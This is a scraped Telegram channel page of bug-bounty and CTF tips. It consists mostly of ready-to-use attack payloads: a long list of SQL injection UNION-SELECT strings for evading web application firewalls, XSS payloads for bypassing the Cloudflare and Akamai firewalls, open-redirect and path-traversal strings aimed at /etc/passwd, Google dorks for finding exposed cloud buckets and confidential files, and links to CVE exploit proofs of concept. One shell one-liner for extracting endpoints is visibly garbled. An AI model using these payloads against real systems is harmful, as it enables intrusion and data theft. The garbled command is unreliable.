en
Feedback
CTF | Bug Bounty

CTF | Bug Bounty

Open in Telegram

šŸ” Join Us for šŸ” 🌐 CTF Resources 🌐 Bug Bounty Resources 🌐 CTF Challenges and More Join now: https://t.me/ctftm šŸ‘¤ Owner: Team Matrix į“…į“į“„į“€/į“„į“į“˜ŹŹ€ÉŖÉ¢Źœį“› į“„ŹŸį“€ÉŖį“ : @Dmcatm Admin Contact: @Teammatrixs_bot

Show more
8 335
Subscribers
No data24 hours
-117 days
-24330 days
Posts Archive
Automating SSRF using Autorepeater In the window of Auto-Repeater, we can specify some regex to find urls. https?:\/\/(www\.)?[-a-zA-Z0–9@:%._\+~#=]{1,256}\.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%_\+.~#?&//=]*) #SSRF L

bypass XSS Cloudflare WAF Encoded Payload: &#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt; Clean Payload: "><track/onerror='confirm1'> HTML entity & URL encoding: " --> &#34; > --> &gt; < --> &lt; ' --> &#x27; ` --> \%60 #Bypass #XSS #WAF

Bypass SQL union select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnIā€On’+'SeLā€ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL

Akamai WAF bypass XSS
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol 
          contenteditable
          onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass

āš”ļøOne Million Dorks - A repository with text files containing a million dorks for finding potentially vulnerable web pages an
āš”ļøOne Million Dorks - A repository with text files containing a million dorks for finding potentially vulnerable web pages and sensitive data (in Google and other search engines). Can be used with various automation tools. šŸŽÆhttps://github.com/HackShiv/OneDorkForAll/tree/main/dorks/1M_dork #bugbounty #cybersecurity

BGPView for Reconnaissance
BGPView for Reconnaissance

šŸ“ŠVulnerable Bank - An intentionally vulnerable application built for learning secure code reviews and to test api pentesting
šŸ“ŠVulnerable Bank - An intentionally vulnerable application built for learning secure code reviews and to test api pentesting skills. GitHub: https://github.com/Commando-X/vuln-bank

šŸ”–A useful one-liner that extracts all API endpoints from AngularJS and Angular JavaScript files. curl -s URL | grep -Po "(\/
šŸ”–A useful one-liner that extracts all API endpoints from AngularJS and Angular JavaScript files.
curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u

Bypass WAF using Burp Repeater - Unicode Encoding Encode payloads into UTF-16 to bypass basic input validation.
Bypass WAF using Burp Repeater - Unicode Encoding Encode payloads into UTF-16 to bypass basic input validation.

āš”ļøSQLI Login Bypass Payloads #bugbounty
āš”ļøSQLI Login Bypass Payloads #bugbounty

⚔Google Dorks - Cloud Storage:  site:http://s3.amazonaws.com "target[.]com" site:http://blob.core.windows.net "target[.]com" site:http://googleapis.com "target[.]com" site:http://drive.google.com "target[.]com"  šŸ‘‰Find buckets and sensitive data. Combine: site:http://s3.amazonaws.com | site:http://blob.core.windows.net | site:http://googleapis.com | site:http://drive.google.com "target[.]com" Add something to narrow the results: "confidentialā€ ā€œprivileged" ā€œnot for public releaseā€ āœ… Credit- Mike Takahashi

šŸ”– Dnsbruter - A powerful tool for active subdomain enumeration and discovery. ✨ Features: Dnsbruter uses DNS resolution to bruteforce and identify subdomains efficiently. Its multithreading capability allows users to control concurrency for faster and more effective results. Perfect for researchers and pen testers targeting domain reconnaissance. šŸ”— https://github.com/RevoltSecurities/Dnsbruter/

ā˜„ļøYou can try this effective manual openredirect Bypassā˜„ļø 1. Null-byte injection:    - /google.com%00/    - //google.com%00   2. Base64 encoding variations:    - aHR0cDovL2dvb2dsZS5jb20=    - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==    - //base64:d3d3Lmdvb2dsZS5jb20=/   3. Case-sensitive variations:    - //GOOGLE.com/    - //GoOgLe.com/ 4. Overlong UTF-8 sequences:    - %C0%AE%C0%AE%2F (overlong encoding for ../)    - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes:    - /%68%74%74%70://google.com    - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D    - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations:    - //google.com@127.0.0.1/    - //127.0.0.1.xip.io/    - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters:    - //google.com/#/    - //google.com/;&/    - //google.com/?id=123&// 8. Octal IP address format:    - http://0177.0.0.1/    - http://00177.0000.0000.0001/ 9. IP address variants:    - http://3232235777 (decimal notation of an IP)    - http://0xC0A80001 (hex notation of IP)    - http://192.168.1.1/ 10. Path traversal with encoding:     - /..%252f..%252f..%252fetc/passwd     - /%252e%252e/%252e%252e/%252e%252e/etc/passwd     - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion:     - ftp://google.com/     - javascript:alert(1)//google.com 12. Protocol-relative URLs:     - :////google.com/     - :///google.com/ 13. Redirection edge cases:     - //google.com/?q=//bing.com/     - //google.com?q=https://another-site.com/ 14. IPv6 notation:     - http://[::1]/     - http://[::ffff:192.168.1.1]/     15. Double URL encoding:     - %252f%252fgoogle.com (encoded twice)     - %255cgoogle.com 16. Combined traversal & encoding:     - /%2E%2E/%2E%2E/etc/passwd     - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based:     - https://google.com.reverselookup.com     - //lookup-reversed.google.com/ 18. Non-standard ports:     - http://google.com:81/     - https://google.com:444/ 19. Unicode obfuscation in paths:     - /%E2%80%8Egoogle.com/     - /%C2%A0google.com/ 20. Query parameters obfuscation:     - //google.com/?q=http://another-site.com/     - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo:     - https://admin:password@google.com/     - http://@google.com 22. Combination of userinfo and traversal:     - https://admin:password@google.com/../../etc/passwd

šŸ”– On-Site Request Forgery (OSRF): An Overview 🚨On-Site Request Forgery (OSRF) is a lesser-known but impactful vulnerability similar to Cross-Site Request Forgery (CSRF). While both involve unauthorized actions performed on behalf of an authenticated user, the fundamental distinction lies in the request origin.   - CSRF: The attacker initiates requests from their controlled domain to exploit a victim's authenticated session.   - OSRF: The requests originate from the vulnerable application itself, and the attacker controls where the requests are directed.   --- šŸ” Where to Find OSRF Vulnerabilities   1. Reflected Inputs in src Attributes      Look for inputs that can be reflected in attributes like src. Example vulnerable tags:     
html 
   <img src="OUR_INPUT_HERE"> 
   <video width="400" height="200" controls src="OUR_INPUT_HERE"> 
   <audio src="OUR_INPUT_HERE"> 
   <iframe src="OUR_INPUT_HERE"> 
   
šŸ‘‰ If the input can be manipulated, it may allow the attacker to direct requests to their desired endpoints. 2. Sensitive Endpoints Using the GET Method      Endpoints performing sensitive actions with GET requests are prime targets for OSRF. For example:         GET /settings.php?remove_account=1      Host: example.com      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0         If such endpoints exist and can be controlled via reflected input, they may be exploited for OSRF. āš ļø Best Practices for Prevention   1. Avoid GET Methods for Sensitive Actions      Use POST methods for actions involving sensitive changes, as they require more intentional execution.   2. Validate and Sanitize Inputs      Ensure all user inputs, especially those reflected in attributes like src, are properly validated and sanitized.   3. Implement Content Security Policies (CSP)      CSPs can limit where resources like images or iframes can be loaded from, reducing the risk of external request manipulation.   4. Monitor and Audit Application Behavior      Regularly test your application for unusual or unintended request behaviors to identify vulnerabilities early.   This additional layer of security awareness helps ensure OSRF vulnerabilities are addressed alongside CSRF for a more robust application defense. Learn More: https://github.com/daffainfo/AllAboutBugBounty/blob/master/On%20Site%20Request%20Forgery.md

āš”ļøSqliSniper: Advanced Time-based Blind SQL Injection fuzzer for HTTP Headers https://github.com/danialhalo/SqliSniper
āš”ļøSqliSniper: Advanced Time-based Blind SQL Injection fuzzer for HTTP Headers https://github.com/danialhalo/SqliSniper

šŸ”– Free Tool for Finding Open S3 Buckets and Files šŸŽÆ Purpose:Search for open Amazon S3 buckets and locate potentially interesting files efficiently. āœ… Tool Links: Explore Open S3 Buckets: https://buckets.grayhatwarfare.com šŸ“Œ Why This is Useful:Helps identify misconfigured S3 buckets. Uncover sensitive data or files accidentally exposed to the public.

⚔You can use #httpx to request any path and see the status code and other details on the go, filter, or matcher flags if you
⚔You can use #httpx to request any path and see the status code and other details on the go, filter, or matcher flags if you want to be more specific.     āœ…httpx -path /swagger-api/ -status-code -content-length

⚔Broken Access Control to Mass Account Takeover.
⚔Broken Access Control to Mass Account Takeover.

Extract all endpoints from a JS File and take your bug šŸž āœ…Method one waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o
Extract all endpoints from a JS File and take your bug šŸž āœ…Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
āœ…Method two
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt
#infosec #cybersec #bugbountytips

#exploit 1. CVE-2024-20356: https://github.com/nettitude/CVE-2024-20356 2. "Randar" Minecraft Exploit: Explanation and Information https://github.com/spawnmason/randar-explanation 3. CVE-2023-20198: Cisco IOS XE Privilege Escalation https://github.com/XiaomingX/CVE-2023-20198-poc